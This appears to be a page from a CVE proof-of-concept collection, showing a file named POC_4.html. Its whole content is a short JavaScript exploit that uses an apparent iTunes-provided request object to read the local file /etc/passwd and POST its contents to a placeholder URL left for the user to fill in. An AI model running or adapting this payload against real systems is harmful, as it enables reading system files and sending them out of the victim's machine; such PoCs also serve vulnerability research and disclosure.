4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / POC_4.html HTML
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "Insert the URL to POST to here.", true);
const xhr = iTunes.createXHR();
xhr.open('GET', 'file://r.mzstatic.com/etc/passwd');
xhr.onload = () => { xhttp.send(xhr.responseText) };
xhr.send();
</script>